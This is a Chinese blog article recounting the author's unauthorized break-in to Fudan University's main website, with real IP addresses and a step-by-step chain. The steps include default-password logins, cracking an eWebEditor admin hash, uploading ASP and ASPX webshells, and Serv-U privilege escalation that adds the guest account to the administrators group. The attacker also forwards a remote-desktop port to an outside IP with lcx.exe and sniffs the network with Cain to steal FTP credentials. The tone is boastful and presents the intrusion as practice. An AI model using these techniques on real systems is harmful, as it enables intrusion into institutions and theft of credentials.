入侵复旦大学网站

PHP5研究室 2009年03月11日 02:24 查看16922次 作者:   【
文章分类:其它杂谈
一、师出有名
      某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他提议说不如我们黑掉复旦吧。正好当时也比较清闲,就答应一起看看了,嘿嘿。这次跑去黑复旦纯粹是为了练习技术。

二、战略部署

      这次要拿的是复旦主站,分站可不是我们的目标了,嘿嘿。要不然拿个分站就挂上复旦的名义似乎有点说不过去。通过google顺利找到复旦大学主站:http://www.fudan.edu.cn/


如图1

PHP的程序,打开了个链接,顺手加个单撇号,提示"警告!提交的数据非法!",又试了几个其他的注入关键字,都被过滤掉了。看来直接从主站下手难度比较大,所以我们得想点其他办法。这里我打算利用嗅探来获取目标站的重要信息,嘿嘿。我们都知道可以根据ping一个目标地址的TTL值来大致判断对方的服务器操作系统!我ping了一下复旦主站,发现TTL值为53,

如图2。

这个数值大致就是Linux的操作系统的了,嘿嘿。要想嗅探就必须要取得与目标服务器同一网段下的某台服务器权限,然后再安装嗅探工具进行嗅探攻击。复旦主站的IP为:61.129.42.5,那我们就必须在61.129.42.*这个网段里先控制一台服务器!

先用SuperScan3.0扫描整个C段的21端口,作用就是先看看有没有windows操作系统的服务器在这个网段里!
至于为什么要扫21嘛,大家都清楚要是装了Serv-U的话要是没什么意外,提权应该是比较容易的嘛,嘿嘿。
扫描结果出来了,有好几台装有Serv-U的,按经验,装了Serv-U的就肯定是windows]系统的了!IP为61.129.42.42这台明显就是windows的系统,Serv-U的版本是6.3的,
如图3。

三、步步为营

     现在目的很明确,就是要先控制住61.129.42.42这台服务器!在浏览器里面填入IP访问,发现页面有点难看,都是些doc文档下载的东西, 对我们来说没什么用。我们可以通过查询域名绑定看看有些什么站在上面。我一般不用明小子查询,因为用它能查出来的已经很少了!用X以前介绍过的一个网站来 查询吧,它查出来的比明小子查的数据要多且准!打开http://www.seologs.com/ip-domains.html,在"Domainor IP address"里填上"61.129.42.42",然后点击"submit"提交,稍等一会就会返回查询结果的了,

如图4。

只有两个,似乎不容乐观哦。居然打开两个都不能访问!后来访问了一下8000端口才有反应了,


如图5。光在这里面也看不出什么来,页面比较简单,可利用的地方不多。值得庆幸的是有个"在线论坛",打开看看,原来是动网的,嘿嘿。

用默认的用户名和密码尝试登录,居然成功了进入了后台


如图6。本以为可以很轻松的拿到webshell的,没想到这个破论坛既不能上传也不能备份!动网没了这两个功能基本上比较难拿到webshell了,郁闷!于是又上了邪恶八进制发帖讨论,没多久就在回复里面看到动网还有个后台列文件的漏洞!嘿嘿,这回似乎又有得搞了!大致方法就是在"基本设置"里修改"上传目录设定",然后到"上传文件管理"里面去查看结果。

列了N久终于发现有可利用的东西了,


如图7。ewebeditor出现了,嘿嘿。
点击打开后台登录页面,


如图8。

尝试默认的用户名和密码发现无法登录进去,看来密码改过了。没关系,反正我们能列文件嘛。
再利用动网列文件的漏洞找到了ewebeditor的数据库文件,下载回来,用明小子的数据库管理功能打开,查看了管理员密码的MD5散列,


如图9
再到MD5查询网站查询密码,幸运的是密码并不复杂,顺利查了出来,

如图10。用得到的用户名和密码成功登录了ewebeditor的后台,

如图11

进了ewebeditor拿webshell就比较轻松的了。样式管理-拷贝样式-设置-添加允许上传类型asa,再预览上传asa后缀的ASP马,然后在"上传文件管理"里就可以看到马的了,点击直接访问webshell

如图12

在图12里面,我们可以看到有ASPNET这个用户,一般来说很有可能支持ASPX,因为ASPX马的权限一般要比ASP的高。所以我上传了一个ASPX马。
然后再传了一个SU提权的ASP马,执行:
"net user guest /active:yes"
"net user guestpassword"
"net localgroup administrators guest/add"
三条命令,意思是先激活guest用户,再给guest用户设定一个密码,再把guest用户添加进管理员组。幸运的是Serv-U的默认连接密码没有改,命令都成功执行了。
在ASPX马里执行:"net user guest"我们可以发现guest已经隶属于管理员组了,

如图13

用ASPX马读取了注册表的远程桌面服务端口,发现就是默认的3389,不过Terminal Services服务当时是没有开的。后来wyzhack放了鸽子才给开了,嘿嘿。

四、守株待兔

     直接连接3389是行不通的,防火墙把我们挡在了外面。不过我们可以用lcx.exe给它来个端口转发。直接用ASPX马或者SU提权马发现都不能 执行lcx.exe进行转发,所以我想通过修改Serv-U的配置文件来添加一个具体system权限的FTP用户,再登录上去进行端口转发。

就是修改C:\ProgramFiles\Serv-U\ServU\Daemon.ini这个文件的内容啦。如何修改我就不废话了,有兴趣的话大家可以 去了解下SU配置文件的存放规则,了解之后修改起来就得心应手的了。我就添加了一个用户名为hackest的,拥有system权限的FTP用户。
要是配置文件没有权限修改的话,可以用SU提权马执行cacls.exe修改文件属性为everyone完全控制就可以修改的了,不过cacls.exe需要文件格式为NTFS的才可以使用哦。

在CMD下登录FTP上去,执行:
C:\Documents and Settings\All UsersDocuments\lcx.exe -slave 219.129.213.252 51 127.0.0.1 3389
本机执行:
lcx.exe -listen 51 2007
然后连接本机的的2007端口就可以登录远程服务器了,

如图14

到这里我们就已经成功控制了61.129.42.42这台服务器。接下来就是安装cain进行嗅探了,具体请参照我的另一篇关于嗅探入侵的文章。
在61.129.42.42上执行"ipconfig /all"命令得知默认网关为61.129.42.1,


如图15。复旦主站的IP为:61.129.42.5。设置好cain就可以开始嗅探攻击了,嘿嘿。由于一开始的那几天是五一假期时间,嗅了两天一无所获。
N天之后终于有进展了,wyzhack告诉我已经成功嗅探到复旦主站的FTP用户名和密码了,


如图16

对于一个网站,有了FTP密码就等于有了一切!利用FTP上传了一个PHP马,进去参观一下,

如图17

五、尘埃落定

      到这里就已经完全控制了复旦大学的主站了!
虽然主站的操作系统是Linux,但是我们通过先控制一台windows的3389肉鸡再进行对目标的嗅探攻击收到了如期的效果。可见嗅探攻击的威力的确非比寻常,不注意这方面的防范也必将被人恶意入侵!
既然是Linux的系统,管理员一般都是用SSL来远程管理服务器的,嘿嘿。
扫描一下主站服务器,发现开了22端口(SSL的默认连接端口为22)尝试用嗅到的FTP用户名和密码登录SSL居然成功了,

如图18

至于通过溢出或者其他提权方法来得到root权限,我就不弄了,因为这方面实在不太熟悉。
本文主要是介绍一种入侵思路,没有什么技术含量。不得不说的一句话:管理员们要小心嗅探攻击了,嗅探的攻击力可是比较厉害的。如有不妥之处还请大家批评斧正!
责任编辑:admin

给文章打分...

平均分:0.0(0 次)

-5 -4 -3 -2 -1 0 1 2 3 4 5
0

顶一下

发表我的见解...

  • 您的大名: 留空为匿名
  • 您的主页:
  • 您的邮箱: